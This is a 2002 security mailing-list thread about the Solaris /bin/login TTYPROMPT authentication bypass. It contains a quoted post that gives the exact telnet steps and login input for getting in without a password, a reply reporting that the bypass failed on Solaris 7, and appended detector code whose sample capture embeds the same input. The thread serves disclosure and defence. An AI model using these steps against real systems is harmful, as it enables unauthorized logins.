Sorry, but I can't reproduce this on a Solaris 7 machine.

sunlight.ccs% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.

SunOS 5.7

login: bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
Password:
Login incorrect

As you can see, I get a request for a username/password.

Ramon Kagan
York University, Computing and Network Services
Unix Team - Intermediate System Administrator
(416)736-2100 #20263
rkagan@yorku.ca
-------------------------------------
I have not failed. I have just found
10,000 ways that don't work.
- Thomas Edison
-------------------------------------

On Wed, 2 Oct 2002, Jonathan S wrote:

> Hello,
>
> Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
> environment variable TTYPROMPT. This vulnerability has already been
> reported to BugTraq and a patch has been released by Sun.
> However, a very simple exploit, which does not require any code to be
> compiled by an attacker, exists. The exploit requires the attacker to
> simply define the environment variable TTYPROMPT to a 6 character string,
> inside telnet. I believe this overflows an integer inside login, which
> specifies whether or not the user has been authenticated (just a guess).
> Once connected to the remote host, you must type the username, followed by
> 64 " c"s, and a literal "\n". You will then be logged in as the user
> without any password authentication. This should work with any account
> except root (unless remote root login is allowed).
>
> Example:
>
> coma% telnet
> telnet> environ define TTYPROMPT abcdef
> telnet> o localhost
>
> SunOS 5.8
>
> bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
> c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n
>
> Last login: whenever
> $ whoami
> bin
>
> Jonathan Stuart
> Network Security Engineer
> Computer Consulting Partners, Ltd.
> E-mail: jons@ccpartnersltd.com
>
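A defender-side check for the pattern both posts describe, added here as an example and not part of either post: the attacker's only network-visible action before the login prompt is a telnet NEW-ENVIRON suboption that defines TTYPROMPT, a variable no legitimate telnet client needs to export. The code below parses the client side of a telnet byte stream (RFC 854 IAC framing, RFC 1572 NEW-ENVIRON encoding) and reports every environment definition a client sends, flagging TTYPROMPT. The byte stream it inspects is constructed, and the function names are my own.

```python
"""Flag telnet clients that export TTYPROMPT via NEW-ENVIRON (RFC 1572).

Constructed example, not code from the original thread. Feed it the bytes a
telnet client sent (from a packet capture or a telnetd wrapper) and it returns
every TTYPROMPT definition it finds, which is what a login-bypass attempt
against the Solaris /bin/login TTYPROMPT bug looks like on the wire.
"""

# RFC 854 command bytes and RFC 1572 option/suboption codes.
IAC, SB, SE = 255, 250, 240
WILL, WONT, DO, DONT = 251, 252, 253, 254
NEW_ENVIRON = 39
IS = 0                            # client -> server: "here are my variables"
VAR, VALUE, ESC, USERVAR = 0, 1, 2, 3


def iter_suboptions(stream: bytes):
    """Yield (option, payload) for each IAC SB <opt> ... IAC SE in `stream`.

    A doubled IAC inside the suboption is unescaped to a single 0xFF byte.
    Unterminated or malformed suboptions end the scan rather than raise.
    """
    i, n = 0, len(stream)
    while i < n - 1:
        if stream[i] == IAC and stream[i + 1] == SB:
            if i + 2 >= n:
                return
            opt, j, payload = stream[i + 2], i + 3, bytearray()
            while j < n:
                b = stream[j]
                if b == IAC:
                    if j + 1 < n and stream[j + 1] == IAC:   # escaped 0xFF
                        payload.append(IAC)
                        j += 2
                        continue
                    break                                    # IAC SE or junk
                payload.append(b)
                j += 1
            if j + 1 < n and stream[j] == IAC and stream[j + 1] == SE:
                yield opt, bytes(payload)
                i = j + 2
            else:
                return
        elif stream[i] == IAC:
            # WILL/WONT/DO/DONT carry an option byte; everything else is 2 bytes.
            i += 3 if stream[i + 1] in (WILL, WONT, DO, DONT) else 2
        else:
            i += 1


def parse_environ_is(payload: bytes):
    """Decode a NEW-ENVIRON IS payload into (kind, name, value) triples.

    kind is 'VAR' or 'USERVAR'; value is None when the client sent no VALUE.
    ESC-prefixed bytes inside names/values are taken literally.
    """
    if not payload or payload[0] != IS:
        return []
    n = len(payload)

    def read_string(i):
        out = bytearray()
        while i < n and payload[i] not in (VAR, VALUE, USERVAR):
            if payload[i] == ESC and i + 1 < n:
                i += 1                     # next byte is literal data
            out.append(payload[i])
            i += 1
        return bytes(out), i

    result, i = [], 1
    while i < n:
        kind = payload[i]
        if kind not in (VAR, USERVAR):
            break
        name, i = read_string(i + 1)
        value = None
        if i < n and payload[i] == VALUE:
            value, i = read_string(i + 1)
        result.append(("VAR" if kind == VAR else "USERVAR", name, value))
    return result


def find_ttyprompt_definitions(stream: bytes):
    """Return every (kind, name, value) where the client defined TTYPROMPT."""
    hits = []
    for opt, payload in iter_suboptions(stream):
        if opt != NEW_ENVIRON:
            continue
        for kind, name, value in parse_environ_is(payload):
            if name.upper() == b"TTYPROMPT":
                hits.append((kind, name, value))
    return hits


# Constructed client-side capture: WILL NEW-ENVIRON, then an IS reply that
# exports TTYPROMPT=abcdef (as a USERVAR) and USER=bin, followed by the
# username line from the posts above.
SAMPLE = (
    bytes([IAC, WILL, NEW_ENVIRON])
    + bytes([IAC, SB, NEW_ENVIRON, IS])
    + bytes([USERVAR]) + b"TTYPROMPT" + bytes([VALUE]) + b"abcdef"
    + bytes([VAR]) + b"USER" + bytes([VALUE]) + b"bin"
    + bytes([IAC, SE])
    + b"bin " + b"c " * 64 + b"\r\n"
)

if __name__ == "__main__":
    for kind, name, value in find_ttyprompt_definitions(SAMPLE):
        print(f"ALERT: client exported {name.decode()} ({kind}) = {value!r}")
```

Any TTYPROMPT definition is worth an alert regardless of its value; the six-character length in the posts is one trigger, not a signature to match on. Sun's patch is the fix; this check only tells you who tried.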